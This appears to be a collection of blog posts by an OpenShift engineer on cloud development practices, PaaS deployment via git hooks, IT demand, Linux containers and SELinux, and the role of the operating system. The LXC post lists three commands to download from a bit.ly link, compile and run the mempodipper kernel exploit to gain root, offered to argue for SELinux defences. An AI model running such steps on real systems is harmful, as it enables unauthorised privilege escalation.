I’ve seen a lot of interesting evolutionary changes in our development practices over the last 10 years or so and I actually don’t think there have been many revolutionary changes. Until now, that is. The power of cloud technologies has introduced a new twist in what development teams can utilize – infinite resources. Yeah, yeah, I know there really is a capacity limit and I know someone still pays the bill at the end of the day but it’s still fundamentally different than what we are used to. Without even realizing it, we have built development processes around resource constraints – everything from how developers code, to our QE, to our release processes. But that doesn’t have to be the case anymore and it doesn’t have to break the bank either. On OpenShift, we decided early on to build our development process entirely around the concept of using as many volatile resources as we needed to see how productive we could be. I’ll let you judge for yourself, but to me, the results have been astounding. Not only is our team more productive than any development team I’ve worked with before, but we are shockingly more cost effective as well.
Let’s take a trip down memory lane first to give you some context to my past experience. If you roll back the clock 5 years or so, scaling development was painful. Development essentially ran off desktops and the operations controlled environments were rigid and static. On the development side, I was constantly struggling to get powerful enough desktops and enough of them to keep the development team productive. Virtualization wasn’t that prominent yet, so often the developers needed two or three desktops to emulate multi-tier systems. I spent as much time in purchasing and unpacking boxes as I did coding (and on the warranty calls when the things broke down). We would constantly have power issues and stability issues as developers would inevitably start hosting shared services on their desktops like our test or continuous integration servers. Power outages every few days would destabilize services and every once in a while kill a hard drive that wasn’t backed up. On the other hand, our operations controlled environments that had stable power and redundant storage were ridiculously expensive and effectively static. Those environments were essentially mirrors of production and expected to be as stable as production. Developers needed agility so they stuck to their desktops. It’s the classic development and operations divide and I’ve seen this same scenario play out time and time again.
When we started OpenShift, we wanted to approach it differently. Sure, everyone still gets a laptop (or in some cases a desktop) for a personalized development environment but that is where physical resources stop. Developers have the ability to spin up as many mini-environments as they need and sync their local code to those environments. They can use those mini-environments to kick off various suites of tests as well as do ad-hoc testing of their own. They might only need a single environment if they are working on a single feature or they might need a dozen. The focus for us was on ease of consumption – a single command and a 30 second wait is all they need to spin up a new environment of the latest stable build. Another command synchronizes their local changes to that environment. The most important thing is that there are no limits to the number of environments they can wield – whatever makes them productive.
But let’s talk cost effectiveness. How can we provide something like this and not completely break the bank? Well, this is where IaaS pricing can start benefiting the consumer. Before you get there however, you have some challenges to solve. The first challenge is the developer habit of keeping long running machines around. Any time a developer wanted to test something, we wanted them to be able to spin up a new machine with their changes. You have to make it easier to start with a new machine instead of keeping an old one around. Our goal was to keep that entire operation to under a minute, providing easy access to various levels of the codebase and that did the trick for us. Once you’ve broken the requirement of long running machines, you now start to take advantage of hourly pricing with most IaaS vendors. If a developer can spin up a machine, run their tests and finish in an hour, you probably paid about $0.30 for that operation. If they need 6 hours, you are paying less than $2. To help reinforce this model, any machine that hasn’t been logged into in 6 hours in our environment automatically gets stopped. The reality is that developers aren’t great at cleaning up, but once you get the model right, they don’t need resources for a long time. If you get the habit formed around starting each time with a new VM, everything else starts to fall in place.
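To make the arithmetic and the cleanup rule concrete, here is a minimal sketch. It is not our actual tooling: the rate is just the rough $0.30 per hour figure from above, billing in whole hours is an assumption about the IaaS vendor, and the `Machine` class and function names are made up for illustration.

```python
import math
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List

HOURLY_RATE_USD = 0.30            # assumed: the rough per-hour figure quoted above
IDLE_LIMIT = timedelta(hours=6)   # machines untouched for this long get stopped


def usage_cost(hours_used: float, hourly_rate: float = HOURLY_RATE_USD) -> float:
    """Cost of one machine, assuming the vendor bills every started hour in full."""
    return round(math.ceil(hours_used) * hourly_rate, 2)


@dataclass
class Machine:
    # Hypothetical record of a development machine; not a real API.
    name: str
    last_login: datetime
    running: bool = True


def stop_idle_machines(machines: List[Machine], now: datetime,
                       idle_limit: timedelta = IDLE_LIMIT) -> List[str]:
    """Mark every running machine with no login inside idle_limit as stopped.

    Returns the names of the machines that were stopped on this pass.
    """
    stopped = []
    for machine in machines:
        if machine.running and now - machine.last_login >= idle_limit:
            machine.running = False
            stopped.append(machine.name)
    return stopped
```

With these assumptions, `usage_cost(1)` comes to 0.30 and `usage_cost(6)` to 1.80, which is where the "less than $2" above comes from. In a real setup the stop step would call your IaaS provider's API instead of flipping a flag.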
And yes, being Red Hat, we’ve also open sourced this work (https://github.com/openshift/origin-dev-tools). While these tools are fairly specialized for OpenShift development, hopefully you might find a nugget or two in them that will help in your own process. And we’re always up for suggestions so if you see a better way of doing something, please send us a pull request!
Next up, I’ll discuss how we expanded upon this to improve our code submission and review process. As many readers will know, cutting and testing code is only one part of developer effectiveness. We’ve been able to use these same techniques to fundamentally change how we look at code. Ever wonder what that OpenShift GitHub Bot is all about commenting on pull requests (e.g. https://github.com/openshift/origin-server/pull/1238)? If so then stay tuned!
I’ve noticed a growing trend over the last year with companies that are providing exciting new enterprise software, the promise of support and no chance of being able to deliver on it. And unfortunately, for consumers trying to sort through all the new offerings out there, it can sometimes be difficult to separate all the marketing glitz and glamour from the reality. With OpenShift, Red Hat is able to stand behind the software that it distributes – they have deep expertise in every layer of the stack. Given that, it frustrates me when I see others claim the same model without the expertise – that approach is just taking advantage of customers who don’t do their homework before buying.
Let’s think about what would happen if more industries took this same approach – the medical profession for example. Imagine what the conversation might be after your yearly check-up.
Doctor: Well, I’ve got some good news and some bad news. The good news is that you still look okay. The bad news is that there is something going on under the surface that you are going to want to figure out.
You: Okay… what exactly do you mean by ‘under the surface’? Also, when you say that ‘I’ will need to figure this out, what do you mean?
Doctor: I mean something is going on underneath your skin. What happens under there is basically a mystery to us – it’s not something we support. That said, whatever is going on probably needs to be fixed so you’ll want to find someone that can do that. We could try but we really don’t have any better odds than you in fixing the problem…
If a conversation like this is so unacceptable in other disciplines, why do we so readily accept it in software? Let’s take Platform as a Service (PaaS) for example. PaaS is a platform positioned to be the core application foundation in your company. It is tightly integrated with both the operating system (OS) and your application platforms. Those that say otherwise are either dreaming or trying to deceive you. That tight integration is what lets the PaaS platform do things so that you don’t have to. But many of the PaaS vendors in the market have limited experience across the OS and the application stacks. In almost all cases, the PaaS providers are going to have to rely on a separate company for the operating system distribution. In many cases, they are going to have to do the same for the application stacks.
What are these companies going to do when their customers hit issues in areas outside of the core PaaS software? Most of these guys aren’t active in the open source versions of the software so I doubt they are going to do the fixes themselves. Don’t let them give you the ‘power of open source software’ pitch unless they are involved enough to influence those changes. Maybe they will proceed with the same awkward conversation as the above example…
Now, maybe these providers have the ability to support all the things they promise. Maybe they have all the connections in the open source projects to maintain stable distributions themselves. This is what Red Hat does but I don’t see too many others doing the same. At a minimum, you should check because you might end up buying a product from a company whose business model is based on you not making that call for help…
To some, cloud is an excuse to introduce “black box” processes that lock users into their services. But they can’t really come right out and say that. Instead they distract from their approach with fanciful names and tell us that the cloud is full of magic and wonder that we don’t need to understand. This type of innovation is exciting to some, but to me, combining innovation with a lock-in approach is depressing. In the past, we’ve seen it at the operating system level and the hypervisor level. We’ve also seen open source disrupt lock-in at both levels and we are going to see the same thing happen in the cloud.
When we started designing and building OpenShift, we wanted to provide more than just a good experience to end users that, in turn, locked them in to our service. One of the early design decisions we made on OpenShift was to utilize standards as much as we could and to make interactions transparent at all levels. We did want the user experience to be magical but also completely accessible to those who wanted to dig in. To demonstrate this, let’s walk through the deployment process in OpenShift – arguably the most magical part of the entire offering…
As we were designing a PaaS service, focused on developers, our first goal was to make the deployment process as natural as possible for developers. For most developers, their day to day process goes something like code, code, code, commit. For those questioning this process already let me speak on behalf of the developer in question by saying
Tests?! Of course I’ve already written the tests! They were in the third ‘code’!
Anyway, we wanted to plug into that process and to do that we chose git. The reason for selecting git over more centralized source code management tools like subversion was that the distributed nature of git allowed the user to have full control over their data. The user always had access to their entire historical repository and as developers, we thought that was a critical requirement. Given that, we standardized on git as the main link between our users’ code and OpenShift.
Now let’s look at what that development process might look like in practice. First, you start off with the code, code, commit part:
vi <file of your choice> # make earth shattering changes
git commit -a -m "My earth shattering comment"
The next part of the process for those familiar with git is the publish process. You run a ‘push’ command to move your code from your local repository to your distributed clones. So when you run:
git push
Your code is transferred to OpenShift and automatically deployed to your environment. Regardless of whether code needs to be compiled, tests need to be run, dependencies need to be downloaded, a specific packaging spec needs to be built – it all happens on the server side with this one command. To do this we utilize a git hook to kick off the deployment process. Wait – I know what you are thinking…
What?! Just a git hook?! This is the cloud baby! Shouldn’t this be custom compiling my code into a Zeus Hammer to perform a magical Cloud Nuclear transfer?!!
If you ask us, a git hook works just fine because it’s what you would probably do yourself. We simply map the post-receive git hook to a post_receive_app.sh script. That script invokes a series of scripts (called hooks) representing various steps in the deployment process. Some of the hooks are provided by the cartridge that your application is using and some of the scripts are provided by the application itself. This approach lets the cartridge provide base functionality that can be further customized by the application.
First let’s talk about the cartridge hooks. Having cartridge specific hooks is important because each cartridge needs to do different things in their deployment process. For example, when a Java cartridge detects a deployment, we want to do a Maven build, but when a Ruby cartridge detects a deployment, it should execute Bundler. The cool part is that each individual cartridge can override anything it needs to in the default process.
Let’s look at how the Ruby cartridge implements this. We can look at the ruby-1.9 cartridge’s overridden build.sh script to see how it calls bundler. When you use the Java cartridge, it leverages Maven in the build process using the same technique. You can implement the pieces that are right for your cartridge where it makes sense and still utilize the generic process everywhere else. In isolation, each individual script is really quite simple. In aggregate though, all those extensions can become extremely powerful and do much of the heavy lifting on behalf of the users.
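If it helps to see the override idea in miniature, here is a rough sketch in Python. To be clear, this is not the OpenShift code (the real thing is a set of shell scripts). The step names, the dictionary layout and the exact `bundle install` and `mvn package` strings are assumptions chosen only to illustrate "generic process, with each cartridge overriding what it needs".

```python
from typing import Callable, Dict, List

Step = Callable[[], str]


# Generic steps every cartridge gets for free (names are illustrative).
def default_build() -> str:
    return "nothing to build"


def default_deploy() -> str:
    return "start application"


DEFAULT_STEPS: Dict[str, Step] = {
    "build": default_build,
    "deploy": default_deploy,
}

# Each cartridge overrides only the steps it cares about.
# The commands below are assumed stand-ins for what a cartridge might run.
CARTRIDGE_OVERRIDES: Dict[str, Dict[str, Step]] = {
    "ruby-1.9": {"build": lambda: "bundle install"},
    "java": {"build": lambda: "mvn package"},
}


def run_deployment(cartridge: str) -> List[str]:
    """Merge the cartridge overrides over the defaults and run each step in order."""
    steps = {**DEFAULT_STEPS, **CARTRIDGE_OVERRIDES.get(cartridge, {})}
    return [f"{name}: {step()}" for name, step in steps.items()]
```

Calling `run_deployment("ruby-1.9")` swaps in the Bundler build but keeps the generic deploy, while a cartridge with no overrides simply falls through to the defaults.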
But, what if you want to change the default behavior for a specific application? No problem! You have a collection of action hooks that are provided with each application instance in their repository. You could put your own code in pre_build, build, deploy, post_deploy or wherever else it makes sense. These are found in your application in ~/.openshift/action_hooks. They are invoked just like the cartridge hooks as part of the deployment process. For example, you can see how the pre_build.sh script is called before we run the build. What you choose to do with these hooks is your decision. Put some code in them and they will get called at each step in the deployment process. This lets you not only leverage the power of a customized cartridge, but also lets you tweak and tune so things are just right for your application.
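Here is a small sketch of what "call the hooks that exist, in order" could look like. Again, this is an illustration and not the real post_receive_app.sh logic: the hook order is taken from the names listed above, and the rule of silently skipping missing or non-executable hooks is my assumption.

```python
import os
import subprocess
from pathlib import Path
from typing import List

# Assumed order, based on the hook names mentioned above.
HOOK_ORDER = ["pre_build", "build", "deploy", "post_deploy"]


def run_action_hooks(hooks_dir: Path) -> List[str]:
    """Run each action hook that exists and is executable, in deployment order.

    Returns the names of the hooks that ran. A failing hook raises
    subprocess.CalledProcessError, which stops the remaining steps.
    """
    ran = []
    for name in HOOK_ORDER:
        hook = hooks_dir / name
        if hook.is_file() and os.access(hook, os.X_OK):
            subprocess.run([str(hook)], check=True)
            ran.append(name)
    return ran
```

The nice property of this shape is that an application with no hooks at all behaves exactly like the stock cartridge, and dropping in a single executable file is enough to customize one step.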
At the end of the day, harnessing the power of the cloud doesn’t need to lock you into a vendor. At OpenShift, we believe that transparency, standards and extensibility will make a process that stands the test of time. I hope this has provided some visibility to how the OpenShift deployment model works and also has given you some insight into navigating the codebase. And if this has piqued your interest and you find yourself digging through more and more code, please reach out and get involved.
Today I read a great article that compared the adoption of cloud in IT to the adoption of open source. In a nutshell, cloud is being resisted by IT groups much like open source used to be resisted. Given my role on OpenShift and having been at Red Hat for several years, I’ve seen both forms of this resistance in the field. In this post, I’ll try and debunk one of the most common IT dismissals of utilizing cloud:
I don’t have dynamic demand – cloud won’t help me
That is a tricky defense tactic because many people in IT believe it to be true. To dispel this myth, I find it best to break demand into external and internal demand.
It is fairly easy to tell whether your company has dynamic external demand. That usually boils down to whether or not you have seasonal demand (e.g. retail sites and Black Friday) or event driven demand (e.g. a Super Bowl ad). Companies with seasonal or spiky production demand have an obvious use case for the elasticity of cloud but that is only half the story.
However, while relatively few companies have dynamic external demand, the vast majority of IT shops have an unknown dynamic demand internally: their own consumers and development teams. But when first asked, they often believe this not to be the case. The conversation usually goes this way:
Question: Are you giving your users all the resources they think they need?
Answer: No. They always ask for more than they need and we don’t have the capacity. The initial requests just aren’t reasonable.
Question: Is the process for getting resources easy or self-service or does it require a ton of justification and cost?
Answer: We have to make the process tough. If we gave users what they asked for, we’d go broke!
Question: Do your users ever give back unused resources or do they try and hold on to them forever?
Answer: That’s just it – they never give anything back! They would keep it forever if we didn’t watch them like hawks and claw it all back…
At that point, this is the question that often makes them re-think their initial assumption about not having dynamic demand internally:
Question: If you gave users everything they wanted and were able to recoup those resources when they weren’t used, would you have dynamic demand?
Answer: (long pause) Yeah…. I guess we would. (long pause) Haven’t thought about it that way before…
I’ve had this same conversation play out time and time again. Most of the guys on the IT side aren’t knowingly being malicious, but they have built a protective system over the course of years and have lost sight of what their users actually need. They think that they are protecting users from themselves whereas in reality, they are eliminating themselves as a credible service provider. Under-served users will just go directly to the public cloud providers and work around IT entirely. This has been happening with SaaS offerings such as Salesforce.com for years and the behavior will be no different with public cloud providers.
IT organizations that embrace these changes will more likely end up being a strategic partner with their users. By leveraging cloud technologies instead of rejecting them, they can revolutionize the way they provide compute resources to their users and combine that with the valuable corporate data they already have. Having worked in IT, I think this is the underlying desire of many IT shops. Unfortunately, the processes they have built for themselves are often working against that desire without them even knowing. Those that will survive will need to change and change fast to maintain relevance.
First off, let me state that I think the LXC project is great. In previous blog posts, I’ve talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, cost, etc. This concept is often referred to as ‘Linux Containers’ and creating these containers with the LXC project is a very popular approach. LXC aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way. Good stuff. The question, however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.
In the words of Dan Berrange:
Repeat after me “LXC is not yet secure. [. . .]”
In other words, no, it’s not enough. The main problem right now is that LXC doesn’t have any inherent protection against exploits that allow a user to become root. In the world of Linux, traditionally if you have root you can do anything. When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box. I think the official term for that situation in IT is a ‘cluster’. While the concept of capabilities is being introduced into the kernel to help segment the abilities that root actually has, that is a long ways out from being a realistic defense, especially on the production systems in deployment today.
How realistic are these exploits, though? To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen. Maybe they prefer to think that it’s limited to the realm of academic discussions. Or maybe they just believe it’s not going to happen to them.
Unfortunately, the reality is quite different. While I agree that finding an exploit requires an amazing amount of knowledge and creativity, using an exploit for malicious purposes isn’t that challenging. For example, let’s look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access. Jason explains how this exploit works in amazing detail here – http://blog.zx2c4.com/749. Believe me, discovering that and writing that article was a LOT of work. But now, let’s look at how easy it is to use that exploit on unpatched kernels:
- Download the provided C program (e.g. wget http://bit.ly/wELTpn)
- Compile it (gcc mempodipper.c -o mempodipper)
- Run it and get root access (./mempodipper)
Pretty scary huh? Three steps and I could get root on your machine. I can hear the sighs of relief already though, as people start thinking:
I don’t have to worry about this since I don’t let people run arbitrary code on my machines…
Let’s discuss that train of thought for a minute. First, let’s approach this from the perspective of a Platform as a Service (PaaS). A PaaS essentially allows users to run their own code on machines shared by many. That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all. And remember, if any user can get root on that system, they own all the applications on it.
Not consuming or hosting a PaaS? Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all too different. Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposures by anyone that is able to deploy a change into your environment.
Well if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?!?! Thankfully, there is.
The solution is using SELinux in combination with whatever container technologies you are using. With an SELinux policy, you are essentially able to control the operations of any running process, regardless of what user they happen to be. SELinux provides a layer of protection against the root layer where most other security mechanisms fail. When a user is running in a SELinux context on a system and tries an exploit like the one above, you have an extra line of defense. It’s easy for you to establish a confined environment that limits riskier operations like syscalls to setuid and restricts memory access which, in turn, would stop this exploit and others. Most importantly, you can get consistent protection across any process, no matter what user they are running as.
You can think of SELinux as a whitelisting approach instead of blacklisting. The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do. Given the complexity of systems today, that’s becoming unrealistic for mere mortals. The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.
While it’s not a silver bullet, it’s an elegant mitigation in many areas. Many types of IT hosting are becoming increasingly standardized and you can put in place fairly simple policies that specify what users should be able to do. For web applications, you are going to allow binding to HTTP / HTTPS ports. You are going to probably allow JDBC connections. You can describe the allowed behaviors of many of your applications in a fairly concise way. Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation). Unless you have a pretty special web application, it’s safe to say it shouldn’t be doing that stuff 🙂
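The whitelist versus blacklist difference is easy to see in a toy example. This is only a conceptual sketch in Python, not SELinux policy syntax, and the operation names and rules below are invented for illustration. The point is what happens to an operation nobody thought about in advance.

```python
from typing import Set, Tuple

Operation = Tuple[str, object]

# Whitelist (default deny): list what a web application SHOULD be able to do.
ALLOWED: Set[Operation] = {
    ("bind_port", 80),
    ("bind_port", 443),
    ("connect", "jdbc"),
}

# Blacklist (default allow): list what we remembered to forbid.
DENIED: Set[Operation] = {
    ("setuid", 0),
}


def whitelist_allows(action: str, target: object) -> bool:
    """Permit only operations that were explicitly enabled."""
    return (action, target) in ALLOWED


def blacklist_allows(action: str, target: object) -> bool:
    """Permit everything except operations that were explicitly forbidden."""
    return (action, target) not in DENIED
```

An unanticipated operation such as `("write", "/proc/self/mem")` sails through `blacklist_allows` because nobody listed it, while `whitelist_allows` rejects it for the same reason. That asymmetry is why describing allowed behavior tends to hold up better against creative exploits.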
Interested in learning more? The place I recommend to start is with the Fedora documentation. Fedora and RHEL have some of the best SELinux policies and support in the industry. The documentation covers everything from learning SELinux to debugging it. Most importantly though, don’t get fooled into thinking all Linux distributions are the same. While SELinux support is in the kernel, what really matters is the ecosystem of policies that exist. In Fedora or RHEL, you get whitelists ready-made for a slew of well known systems like Apache. In many other distros, you’d spend your time having to recreate that work for the standard systems and never have any time to focus on your application policies. Probably not your best use of time and would be a daunting first experience with SELinux to say the least.
My last disclaimer is that even as powerful as SELinux is, I wouldn’t recommend putting all your eggs in one basket when it comes to security. Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc). In other words, use it as an enhancement to what you do today, not a replacement.
Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!
Those that know me probably know where this is going. However, for those of you that do not know me, I’ll state my stance up front:
I do not understand the logic behind the argument that the operating system will become less relevant in the cloud. That is a fallacy.
I realize that this is a popular messaging approach for some vendors that have a minimal stake or understanding of the operating system. However, please don’t get pulled into that marketing machine. Let’s try and look at this from a more practical standpoint. I often hear this reasoning brought up in the following context:
- You don’t care what operating system you are running in the cloud. You only have to care about your application.
I spend my days building a Platform as a Service (PaaS) offering (aka OpenShift) so I’m particularly sensitive to this argument. While I agree that our goal on OpenShift is to make the developer experience as simple as possible, everything beyond the initial registration experience today is going to take you to interacting with the operating system at some level. Beyond your personal machine setup, technologies like SSH are heavily used in PaaS offerings. In addition to being the backbone of the mundane functions like supporting authentication and providing the underlying protocol for git transfers, it’s also often used directly by developers to support use cases like debugging. When your applications are running on remote machines, being able to port forward, attach local debuggers and poke and prod from your laptop is critical. Technologies in Linux like SSH make that possible.
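As a small illustration of the port forwarding case, here is a sketch that builds a plain OpenSSH command for tunneling a local port to a debugger port on a remote application machine. The user, host and port values are placeholders, and the helper name is made up; `-N` (no remote command) and `-L` (local forward) are standard OpenSSH client options.

```python
from typing import List


def ssh_port_forward_command(user: str, host: str,
                             local_port: int, remote_port: int) -> List[str]:
    """Build an ssh command that forwards local_port to remote_port on the remote machine."""
    return [
        "ssh",
        "-N",                                         # forward ports only, run no remote command
        "-L", f"{local_port}:localhost:{remote_port}",  # local port -> port on the remote side
        f"{user}@{host}",
    ]
```

You could hand the resulting list to `subprocess.run` and then point a local debugger at `localhost` on the chosen port. Nothing about this is specific to any one PaaS, which is the point: it is the same SSH you already know.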
Okay, so maybe SSH is important, but what other aspects of the operating system should you have to care about? I guess that is where the disconnect is to me. A PaaS, or any cloud service, should support and allow you to leverage common tools and standards to the greatest extent possible. Why? Because a lot of people already know them and it makes those users more productive. Why on earth would your users want to go re-implement everything to your standard? If you love rsync and want to use rsync over SSH, it should just work. If you want to schedule something on your PaaS application, you should be able to use cron. If you want to shell out and script something from your PaaS instance, you should be able to run a Bash / Perl script and have all the standard tools just work.
Now, don’t get me wrong, I don’t think you should be forced to use this stuff but it should be there as an option. Why? Because the tools that have worked in Linux for decades still work extremely well. Maybe better tools will be written in Ruby or Python for your use case and I would encourage you to use them if that is the case. Experimentation is critical, but it’s usually most productive if you are building on a stable base. In the cloud, just like in the data center, that base is Linux.
So far, I’ve really only focused on the end user experience and hopefully it’s apparent that even casual cloud users are still going to interact with the operating system regularly. Now if the end users of cloud services are still going to be exposed to the operating system, imagine the people that are building those services! At the end of the day, your competitive edge will be knowing the operating system so that you don’t waste time rebuilding things that already exist. On OpenShift for example, we use bleeding edge operating system functionality such as Linux control groups and filesystem polyinstantiation to help provide workload management and segment users. We could have built something to do that, but if there is already a robust solution in the operating system, why build something new? We use SELinux for security because trying to build a rock solid security layer outside of the kernel is practically impossible. We use quota for managing filesystem allocations, we use tc for traffic control, PAM for authentication support and the list goes on and on. Using the functionality that exists in Linux allows us to focus on our goal of making the developer experience in the cloud easier. We get to focus on challenges that the operating system does not solve like automatically scaling your applications. Our understanding of Linux allows us to not waste time reinventing the wheel.
I’m not completely unreasonable. I do agree that the cloud will affect how you use Linux to some extent. The hardware layer is being abstracted to a large degree. That means you will probably spend more time using networking technologies like SSH than you will messing with SAN configurations. The toolset you use from day to day will shift slightly, but it will be a slight shift, not a replacement. But at the end of the day, the operating system will still be a critical tool in your toolbox. And in the cloud, that operating system is Linux.